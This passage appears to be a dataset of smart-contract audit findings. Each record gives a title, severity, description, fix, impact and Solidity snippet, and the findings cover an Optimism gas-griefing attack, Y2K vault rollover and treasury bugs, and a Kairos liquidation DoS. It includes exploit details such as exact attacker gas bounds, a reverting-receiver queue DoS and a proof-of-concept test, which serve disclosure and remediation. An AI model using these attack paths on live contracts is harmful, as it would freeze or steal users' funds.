`HashingGas`.\\nSo, the `gasLeft()` in line 361 will be: `(G - K1 - 51)*(63/64) - K2 - HashingGas`\\nTo pass the condition `gasleft() >= ((_minGas + 200) * 64) / 63` in `L1CrossDomainMessenger`, it is necessary to have: `(G - K1 - 51)*(63/64) - K2 - HashingGas >= ((_minGas + 200) * 64) / 63` Please note that, `_minGas` here is equal to `_minGasLimit` which is the amount of gas set by the user to be forwarded to the final receiver on L1. 
So, after simplification: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nAll in all:\\nTo pass the gas check in OptimismPortal: `G >= ((_minGasLimit * (1016/1000) + messageLength * 16 + 200_000 + 200) * 64) / 63 + K1`\\nTo pass the gas check in L1CrossDomainMessenger: `G >= [((_minGasLimit + 200) * 64) / 63 + K2 + HashingGas] *(64/63) + 51 + K1`\\nIf, `G` is between these two numbers (bigger than the first one, and smaller than the second one), it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger`, as a result it is possible to attack.\\nSince, K1 and K2 are almost equal to 50_000, after simplification:\\n`G >= (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378`\\n`G >= (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051`\\nSo it is necessary to satisfy the following condition to be able to attack (in that case it is possible that the attacker provides gas amount between the higher and lower bound to execute the attack): (_minGasLimit * (1016/1000) + messageLength * 16 ) * (64 / 63) + 253_378 < (_minGasLimit * (64 / 63) + HashingGas) *(64/63) + 101_051After simplification, we have:messageLength < (HashingGas - 150_000) / 16`\\nPlease note that the `HashingGas` is a function of `messageLength`. In other words, the consumed gas from Line 304 to 325 is a function of `messageLength`, the longer length the higher gas consumption, but the relation is not linear, it is exponential.**\\nSo, for version zero, the condition can be relaxed to: `messageLength < (HashingGas * 2 - 150_000) / 16`\\nThe calculation shows that if the `messageLength` is equal to 1 mb for version 0, the gas consumed during hashing will be around 23.5M gas (this satisfies the condition above). 
While, if the `messageLength` is equal to 512 kb for version 0, the gas consumed during hashing will be around 7.3M gas (this marginally fails to satisfy the condition above).\\nA short summary of calculation is:\\nmessageLength= 128 kb, HashingGas for v1= 508_000, HashingGas for v0= 1_017_287, attack not possible messageLength= 256 kb, HashingGas for v1= 1_290_584, HashingGas for v0= 2_581_168, attack not possible messageLength= 512 kb, HashingGas for v1= 3_679_097, HashingGas for v0= 7_358_194, attack not possible messageLength= 684 kb, HashingGas for v1= 5_901_416, HashingGas for v0= 11_802_831, attack possible messageLength= 1024 kb, HashingGas for v1= 11_754_659, HashingGas for v0= 23_509_318, attack possible\\n\\nWhich can be calculated approximately by:\\n```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n\\n```\\nfunction checkGasV0(bytes calldata _message)\\n public\\n view\\n returns (\\n uint256,\\n uint256,\\n uint256\\n )\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash1 = Hashing.hashCrossDomainMessageV0(\\n address(this),\\n address(this),\\n _message,\\n 0\\n );\\n uint256 gas2 = gasleft();\\n uint256 gas3 = gasleft();\\n bytes32 versionedHash2 = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas4 = gasleft();\\n return (_message.length, (gas1 - gas2), (gas3 - gas4));\\n }\\n```\\n\\nIt means that if for example the `messageLength` is equal to 684 kb (mostly non-zero, only 42 kb zero), and the message is version 0, and for example the `_minGasLimit` is equal to 21000, an attacker can exploit the user's withdrawal transaction by providing a gas meeting the following condition: 
`(_minGasLimit * (1016/1000) + 684 * 1024 * 16 ) * (64 / 63) + 253_378 < G < (_minGasLimit * (64 / 63) + 11_802_831) *(64/63) + 101_051` After, replacing the numbers, the provided gas by the attacker should be: `11_659_592 < G < 12_112_900` So, by providing almost 12M gas, it will pass the check in `OptimismPortal`, but it will revert in `L1CrossDomainMessenger` due to OOG, as a result the user's transaction will not be allowed to be replayed.\\nPlease note that if there is a long time between request of withdrawal transaction on L2 and finalizing withdrawal transaction on L1, it is possible that the gas price is low enough on L1, so economically reasonable for the attacker to execute it.\\nIn Summary:\\nWhen calculating the `baseGas` on L2, only the `minGasLimit` and `message.length` are considered, and a hardcoded overhead is also added. While, the hashing mechanism (due to memory expansion) is exponentially related to the length of the message. It means that, the amount of gas usage during relaying the message can be increased to the level that is higher than calculated value in `baseGas`. So, if the length of the message is long enough (to increase the gas significantly due to memory expansion), it provides an attack surface so that the attacker provides the amount of gas that only pass the condition in `OptimismPortal`, but goes out of gas in `L1CrossDomainMessenger`.чIf all the gas is consumed before reaching to L361, the vulnerability is available. So, it is recommended to include memory expansion effect when calculating `baseGas`.чUsers will lose fund because it is set as finalized, but not set as failed. 
So, they can not replay it.ч```\\nfunction checkGasV1(bytes calldata _message)\\n public\\n view\\n returns (uint256, uint256)\\n {\\n uint256 gas1 = gasleft();\\n bytes32 versionedHash = Hashing.hashCrossDomainMessageV1(\\n 0,\\n address(this),\\n address(this),\\n 0,\\n 0,\\n _message\\n );\\n uint256 gas2 = gasleft();\\n return (_message.length, (gas1 - gas2));\\n }\\n```\\n -Funds can be stolen because of incorrect update to `ownerToRollOverQueueIndex` for existing rolloversчhighчIn the case where the owner has an existing rollover, the `ownerToRollOverQueueIndex` incorrectly updates to the last queue index. This causes the `notRollingOver` check to be performed on the incorrect `_id`, which then allows the depositor to withdraw funds that should've been locked.\\nIn `enlistInRollover()`, if the user has an existing rollover, it overwrites the existing data:\\n```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n\\nHowever, regardless of whether the user has an existing rollover, the `ownerToRolloverQueueIndex` points to the last item in the queue:\\n```\\nownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\n\\nThus, the `notRollingOver` modifier will check the incorrect item for users with existing rollovers:\\n```\\nQueueItem memory item = rolloverQueue[getRolloverIndex(_receiver)];\\nif (\\n item.epochId == _epochId &&\\n (balanceOf(_receiver, _epochId) - item.assets) < _assets\\n) revert AlreadyRollingOver();\\n```\\n\\nallowing the user to withdraw assets that should've been locked.чThe `ownerToRollOverQueueIndex` should be pointing to the last item in the queue in the `else` case only: when the user does not have an existing rollover queue item.\\n```\\n} else {\\n // if not, add to queue\\n rolloverQueue.push(\\n QueueItem({\\n assets: _assets,\\n receiver: 
_receiver,\\n epochId: _epochId\\n })\\n );\\n// Add the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n}\\n// Remove the line below\\n ownerToRollOverQueueIndex[_receiver] = rolloverQueue.length;\\n```\\nчUsers are able to withdraw assets that should've been locked for rollovers.ч```\\nif (ownerToRollOverQueueIndex[_receiver] != 0) {\\n // if so, update the queue\\n uint256 index = getRolloverIndex(_receiver);\\n rolloverQueue[index].assets = _assets;\\n rolloverQueue[index].epochId = _epochId;\\n```\\n -When rolling over, user will lose his winnings from previous epochчhighчWhen `mintRollovers` is called, when the function mints shares for the new epoch for the user, the amount of shares minted will be the same as the original assets he requested to rollover - not including the amount he won. After this, all these asset shares from the previous epoch are burnt. So the user won't be able to claim his winnings.\\nWhen user requests to `enlistInRollover`, he supplies the amount of assets to rollover, and this is saved in the queue.\\n```\\nrolloverQueue[index].assets = _assets;\\n```\\n\\nWhen `mintRollovers` is called, the function checks if the user won the previous epoch, and proceeds to burn all the shares the user requested to roll:\\n```\\n if (epochResolved[queue[index].epochId]) {\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n // rest of code\\n // @note we know shares were locked up to this point\\n _burn(\\n queue[index].receiver,\\n queue[index].epochId,\\n queue[index].assets\\n );\\n```\\n\\nThen, and this is the problem, the function mints to the user his original assets - `assetsToMint` - and not `entitledShares`.\\n```\\nuint256 assetsToMint = queue[index].assets - relayerFee;\\n_mintShares(queue[index].receiver, _epochId, assetsToMint);\\n```\\n\\nSo the user has only 
rolled his original assets, but since all his share of them is burned, he will not be able anymore to claim his winnings from them.\\nNote that if the user had called `withdraw` instead of rolling over, all his shares would be burned, but he would receive his `entitledShares`, and not just his original assets. We can see in this in `withdraw`. Note that `_assets` is burned (like in minting rollover) but `entitledShares` is sent (unlike minting rollover, which only remints _assets.)\\n```\\n _burn(_owner, _id, _assets);\\n _burnEmissions(_owner, _id, _assets);\\n uint256 entitledShares;\\n uint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\n if (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n } else {\\n entitledShares = _assets;\\n }\\n if (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n }\\n if (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n }\\n```\\nчEither remint the user his winnings also, or if you don't want to make him roll over the winnings, change the calculation so he can still withdraw his shares of the winnings.чUser will lose his rewards when rolling over.ч```\\nrolloverQueue[index].assets = _assets;\\n```\\n -Adversary can break deposit queue and cause loss of fundsчhighчCarousel.sol#L531-L538\\n```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n\\nWhen processing deposits for the deposit queue, it _mintShares to the specified receiver which makes a _mint subcall.\\nERC1155.sol#L263-L278\\n```\\nfunction _mint(address to, uint256 id, uint256 amount, bytes memory data) internal virtual {\\n require(to != address(0), \"ERC1155: mint to the zero address\");\\n\\n address operator = _msgSender();\\n uint256[] memory ids = _asSingletonArray(id);\\n uint256[] memory amounts = 
_asSingletonArray(amount);\\n\\n _beforeTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _balances[id][to] += amount;\\n emit TransferSingle(operator, address(0), to, id, amount);\\n\\n _afterTokenTransfer(operator, address(0), to, ids, amounts, data);\\n\\n _doSafeTransferAcceptanceCheck(operator, address(0), to, id, amount, data);\\n}\\n```\\n\\nThe base ERC1155 _mint is used which always behaves the same way that ERC721 safeMint does, that is, it always calls _doSafeTrasnferAcceptanceCheck which makes a call to the receiver. A malicious user can make the receiver always revert. This breaks the deposit queue completely. Since deposits can't be canceled this WILL result in loss of funds to all users whose deposits are blocked. To make matters worse it uses first in last out so the attacker can trap all deposits before themчOverride _mint to remove the safeMint behavior so that users can't DOS the deposit queueчUsers who deposited before the adversary will lose their entire depositч```\\nfunction _mintShares(\\n address to,\\n uint256 id,\\n uint256 amount\\n) internal {\\n _mint(to, id, amount, EMPTY);\\n _mintEmissions(to, id, amount);\\n}\\n```\\n -Controller doesn't send treasury funds to the vault's treasury addressчmediumчThe Controller contract sends `treasury` funds to its own immutable `treasury` address instead of sending the funds to the one stored in the respective vault contract.\\nEach vault has a treasury address that is assigned on deployment which can also be updated through the factory contract:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n\\nBut, the Controller, responsible for sending 
the fees to the treasury, uses the immutable treasury address that it was initialized with:\\n```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) {\\n // // rest of code\\n treasury = _treasury;\\n }\\n\\n // @audit just one example. Search for `treasury` in the Controller contract to find the others\\n function triggerEndEpoch(uint256 _marketId, uint256 _epochId) public {\\n // // rest of code\\n \\n // send premium fees to treasury and remaining TVL to collateral vault\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n // strike price reached so collateral is entitled to collateralTVLAfterFee\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVLAfterFee,\\n address(collateralVault)\\n );\\n\\n // // rest of code\\n }\\n```\\nчThe Controller should query the Vault to get the correct treasury address, e.g.:\\n```\\ncollateralVault.sendTokens(_epochId, collateralFee, collateralVault.treasury());\\n```\\nчIt's not possible to have different treasury addresses for different vaults. It's also not possible to update the treasury address of a vault although it has a function to do that. Funds will always be sent to the address the Controller was initialized with.ч```\\n constructor(\\n // // rest of code\\n address _treasury\\n ) SemiFungibleVault(IERC20(_assetAddress), _name, _symbol, _tokenURI) {\\n // // rest of code\\n treasury = _treasury;\\n whitelistedAddresses[_treasury] = true;\\n }\\n\\n function setTreasury(address _treasury) public onlyFactory {\\n if (_treasury == address(0)) revert AddressZero();\\n treasury = _treasury;\\n }\\n```\\n -User deposit may never be entertained from deposit queueчmediumчDue to FILO (first in last out) stack structure, while dequeuing, the first few entries may never be retrieved. 
These means User deposit may never be entertained from deposit queue if there are too many deposits\\nAssume User A made a deposit which becomes 1st entry in `depositQueue`\\nPost this X more deposits were made, so `depositQueue.length=X+1`\\nRelayer calls `mintDepositInQueue` and process `X-9` deposits\\n```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n\\nThis reduces deposit queue to only 10\\nBefore relayer could process these, Y more deposits were made which increases deposit queue to `y+10`\\nThis means Relayer might not be able to again process User A deposit as this deposit is lying after processing `Y+9` depositsчAllow User to dequeue deposit queue based on index, so that if such condition arises, user would be able to dequeue his deposit (independent of relayer)чUser deposit may remain stuck in deposit queue if a large number of deposit are present in queue and relayer is interested in dequeuing all entriesч```\\n while ((length - _operations) <= i) {\\n // this loop impelements FILO (first in last out) stack to reduce gas cost and improve code readability\\n // changing it to FIFO (first in first out) would require more code changes and would be more expensive\\n _mintShares(\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n emit Deposit(\\n msg.sender,\\n queue[i].receiver,\\n _epochId,\\n queue[i].assets - relayerFee\\n );\\n depositQueue.pop();\\n if (i == 0) break;\\n unchecked {\\n i--;\\n }\\n }\\n```\\n -changeTreasury() Lack of check and 
remove oldчmediumчchangeTreasury() Lack of check and remove old\\nchangeTreasury() used to set new treasury The code is as follows:\\n```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n\\nThe above code has the following problem:\\nno check whether the new treasury same as the old. If it is the same, the whitelist will be canceled.\\nUse setTreasury(VaultFactoryV2.treasury), it should be setTreasury(_treasury)\\nnot cancel old treasury from the whitelistч```\\n function changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n+ require(vaults[0].treasury() !=_treasury,\"same\"); //check same\\n+ IVaultV2(vaults[0]).whiteListAddress(vaults[0].treasury()); //cancel old whitelist\\n+ IVaultV2(vaults[1]).whiteListAddress(vaults[1].treasury()); //cancel old whitelist\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n+ IVaultV2(vaults[0]).setTreasury(_treasury);\\n+ IVaultV2(vaults[1]).setTreasury(_treasury);\\n- IVaultV2(vaults[0]).setTreasury(treasury);\\n- IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\nчwhiteListAddress abnormalч```\\n function 
changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n {\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n }\\n```\\n -mintRollovers should require entitledShares >= relayerFeeчmediumчmintRollovers should require entitledShares >= relayerFee\\nIn mintRollovers, the rollover is only not skipped if queue[index].assets >= relayerFee,\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n\\nIn fact, since the user is already profitable, entitledShares is the number of assets of the user, which is greater than queue[index].assets, so it should check that entitledShares >= relayerFee, and use entitledShares instead of queue[index].assets to subtract relayerFee when calculating assetsToMint later.чChange to\\n```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n// Remove the line below\\n if (queue[index].assets < relayerFee) {\\n// Add the line below\\n if (entitledShares < relayerFee) {\\n index// Add the line below\\n// Add the line below\\n;\\n continue;\\n }\\n// rest of code\\n// Remove the line below\\n uint256 assetsToMint = queue[index].assets // Remove the line below\\n relayerFee;\\n// Add the line below\\n uint256 assetsToMint = entitledShares // Remove the line below\\n relayerFee;\\n```\\nчThis will prevent rollover even if the user has 
more assets than relayerFeeч```\\n if (entitledShares > queue[index].assets) {\\n // skip the rollover for the user if the assets cannot cover the relayer fee instead of revert.\\n if (queue[index].assets < relayerFee) {\\n index++;\\n continue;\\n }\\n```\\n -Vault Factory ownership can be changed immediately and bypass timelock delayчmediumчThe VaultFactoryV2 contract is supposed to use a timelock contract with a delay period when changing its owner. However, there is a loophole that allows the owner to change the owner address instantly, without waiting for the delay period to expire. This defeats the purpose of the timelock contract and exposes the VaultFactoryV2 contract to potential abuse.\\nIn project description, timelock is required when making critical changes. Admin can only configure new markets and epochs on those markets.\\n```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n\\nThe VaultFactoryV2 contract has a `changeOwner` function that is supposed to be called only by the timelock contract with a delay period.\\n```\\nfunction changeOwner(address _owner) public onlyTimeLocker {\\n if (_owner == address(0)) revert AddressZero();\\n _transferOwnership(_owner);\\n }\\n```\\n\\nThe VaultFactoryV2 contract inherits from the Openzeppelin Ownable contract, which has a `transferOwnership` function that allows the owner to change the owner address immediately. However, the `transferOwnership` function is not overridden by the `changeOwner` function, which creates a conflict and a vulnerability. 
The owner can bypass the timelock delay and use the `transferOwnership` function to change the owner address instantly.\\n```\\n function transferOwnership(address newOwner) public virtual onlyOwner {\\n require(newOwner != address(0), \"Ownable: new owner is the zero address\");\\n _transferOwnership(newOwner);\\n }\\n```\\nчOverride the `transferOwnership` function and add modifier `onlyTimeLocker`.чThe transferOwnership function does not work as designed (using timelock); the timelock delay becomes useless. This means that if the owner address is hacked or corrupted, the attacker can take over the contract immediately, leaving no time for the protocol and the users to respond or intervene.ч```\\n 2) Admin can configure new markets and epochs on those markets, Timelock can make cirital changes like changing the oracle or whitelisitng controllers.\\n```\\n -VaultFactoryV2#changeTreasury misconfigures the vaultчmediumчVaultFactoryV2#changeTreasury misconfigures the vault because the setTreasury subcall uses the wrong variable\\nVaultFactoryV2.sol#L228-L246\\n```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n\\nWhen setting the treasury for the underlying vault pair it accidentally uses the treasury variable instead of _treasury.
This means it uses the local VaultFactoryV2 treasury rather than the function input.\\nControllerPeggedAssetV2.sol#L111-L123\\n```\\n premiumVault.sendTokens(_epochId, premiumFee, treasury);\\n premiumVault.sendTokens(\\n _epochId,\\n premiumTVL - premiumFee,\\n address(collateralVault)\\n );\\n // strike price is reached so collateral is still entitled to premiumTVL - premiumFee but looses collateralTVL\\n collateralVault.sendTokens(_epochId, collateralFee, treasury);\\n collateralVault.sendTokens(\\n _epochId,\\n collateralTVL - collateralFee,\\n address(premiumVault)\\n );\\n```\\n\\nThis misconfiguration can be damaging as it may cause the triggerDepeg call in the controller to fail due to the sendToken subcall. Additionally the time lock is the one required to call it which has a minimum of 3 days wait period. The result is that valid depegs may not get paid out since they are time sensitive.чSet to _treasury rather than treasury.чValid depegs may be missed due to misconfigurationч```\\nfunction changeTreasury(uint256 _marketId, address _treasury)\\n public\\n onlyTimeLocker\\n{\\n if (_treasury == address(0)) revert AddressZero();\\n\\n address[2] memory vaults = marketIdToVaults[_marketId];\\n\\n if (vaults[0] == address(0) || vaults[1] == address(0)) {\\n revert MarketDoesNotExist(_marketId);\\n }\\n\\n IVaultV2(vaults[0]).whiteListAddress(_treasury);\\n IVaultV2(vaults[1]).whiteListAddress(_treasury);\\n IVaultV2(vaults[0]).setTreasury(treasury);\\n IVaultV2(vaults[1]).setTreasury(treasury);\\n\\n emit AddressWhitelisted(_treasury, _marketId);\\n}\\n```\\n -Null epochs will freeze rolloversчmediumчWhen rolling a position it is required that the user didn't payout on the last epoch. 
The issue with the check is that if a null epoch is triggered then rollovers will break even though the vault didn't make a payout\\nCarousel.sol#L401-L406\\n```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n\\nWhen minting rollovers the following check is made so that the user won't automatically roll over if they made a payout last epoch. This check however will fail if there is ever a null epoch. Since no payout is made for a null epoch it should continue to rollover but doesn't.чChange to less than or equal to:\\n```\\n- if (entitledShares > queue[index].assets) {\\n+ if (entitledShares >= queue[index].assets) {\\n```\\nчRollover will halt after null epochч```\\n uint256 entitledShares = previewWithdraw(\\n queue[index].epochId,\\n queue[index].assets\\n );\\n // mint only if user won epoch he is rolling over\\n if (entitledShares > queue[index].assets) {\\n```\\n -Inconsistent use of epochBegin could lock user fundsчmediumчThe epochBegin timestamp is used inconsistently and could lead to user funds being locked.\\nThe function `ControllerPeggedAssetV2.triggerNullEpoch` checks for timestamp like this:\\n```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n\\nThe modifier `epochHasNotStarted` (used by Carousel.deposit) checks it like this:\\n```\\nif (block.timestamp > epochConfig[_id].epochBegin)\\n revert EpochAlreadyStarted();\\n```\\n\\nBoth functions can be called when `block.timestamp == epochBegin`. This could lead to a scenario where a deposit happens after `triggerNullEpoch` is called (both in the same block). Because `triggerNullEpoch` sets the value for `finalTVL`, the TVL that comes from the deposit is not accounted for. 
If emissions have been distributed this epoch, this will lead to the incorrect distribution of emissions and once all emissions have been claimed the remaining assets will not be claimable, due to reversion in `withdraw` when trying to send emissions:\\n```\\nfunction previewEmissionsWithdraw(uint256 _id, uint256 _assets)\\n public\\n view\\n returns (uint256 entitledAmount)\\n{\\n entitledAmount = _assets.mulDivDown(emissions[_id], finalTVL[_id]);\\n}\\n// rest of code\\n//in withdraw:\\nuint256 entitledEmissions = previewEmissionsWithdraw(_id, _assets);\\nif (epochNull[_id] == false) {\\n entitledShares = previewWithdraw(_id, _assets);\\n} else {\\n entitledShares = _assets;\\n}\\nif (entitledShares > 0) {\\n SemiFungibleVault.asset.safeTransfer(_receiver, entitledShares);\\n}\\nif (entitledEmissions > 0) {\\n emissionsToken.safeTransfer(_receiver, entitledEmissions);\\n}\\n```\\n\\nThe above could also lead to revert through division by 0 if `finalTVL` is set to 0, even though the deposit after was successful.чThe modifier `epochHasNotStarted` should use `>=` as comparatorчincorrect distribution, Loss of deposited fundsч```\\nif (block.timestamp < uint256(epochStart)) revert EpochNotStarted();\\n```\\n -Denial-of-Service in the liquidation flow results in the collateral NTF will be stuck in the contract.чmediumчIf the `loanTovalue` value of the offer is extremely high, the liquidation flow will be reverted, causing the collateral NTF to persist in the contract forever.\\nThe platform allows users to sign offers and provide funds to those who need to borrow assets.\\nIn the first scenario, the lender provided an offer that the `loanTovalue` as high as the result of the `shareMatched` is `0`. 
For example, if the borrowed amount was `1e40` and the offer had a `loanTovalue` equal to `1e68`, the share would be `0`.\\nAs a result, an arithmetic error (Division or modulo by 0) will occur in the `price()` function at line 50 during the liquidation process.\\nIn the second scenario, if the lender's share exceeds `0`, but the offer's `loanToValue` is extremely high, the `price()` function at line 54 may encounter an arithmetic error(Arithmetic over/underflow) during the `estimatedValue` calculation.\\nPoof of Concept\\nkairos-contracts/test/BorrowBorrow.t.sol\\n```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(\"price of loanId\", kairos.price(loanId));\\n}\\n```\\nчWe recommend adding the mechanism during the borrowing process to restrict the maximum `loanToValue` limit and ensure that the lender's share is always greater than zero. 
This will prevent arithmetic errors.чThe loan position will not be liquidated, which will result in the collateral NTF being permanently frozen in the contract.ч```\\nfunction testBorrowOverflow() public {\\n uint256 borrowAmount = 1e40;\\n BorrowArg[] memory borrowArgs = new BorrowArg[](1);\\n (, ,uint256 loanId , ) = kairos.getParameters();\\n loanId += 1;\\n\\n Offer memory offer = Offer({\\n assetToLend: money,\\n loanToValue: 1e61,\\n duration: 1,\\n expirationDate: block.timestamp + 2 hours,\\n tranche: 0,\\n collateral: getNft()\\n });\\n uint256 currentTokenId;\\n\\n getFlooz(signer, money, getOfferArg(offer).amount);\\n\\n {\\n OfferArg[] memory offerArgs = new OfferArg[](1);\\n currentTokenId = getJpeg(BORROWER, nft);\\n offer.collateral.id = currentTokenId;\\n offerArgs[0] = OfferArg({\\n signature: getSignature(offer),\\n amount: borrowAmount,\\n offer: offer\\n });\\n borrowArgs[0] = BorrowArg({nft: NFToken({id: currentTokenId, implem: nft}), args: offerArgs});\\n }\\n\\n vm.prank(BORROWER);\\n kairos.borrow(borrowArgs);\\n\\n assertEq(nft.balanceOf(BORROWER), 0);\\n assertEq(money.balanceOf(BORROWER), borrowAmount);\\n assertEq(nft.balanceOf(address(kairos)), 1);\\n\\n vm.warp(block.timestamp + 1);\\n Loan memory loan = kairos.getLoan(loanId);\\n console.log(\"price of loanId\", kairos.price(loanId));\\n}\\n```\\n -Adversary can utilize a large number of their own loans to cheat other lenders out of interestчmediumчThe minimal interest paid by a loan is scaled by the number of provisions that make up the loan. 
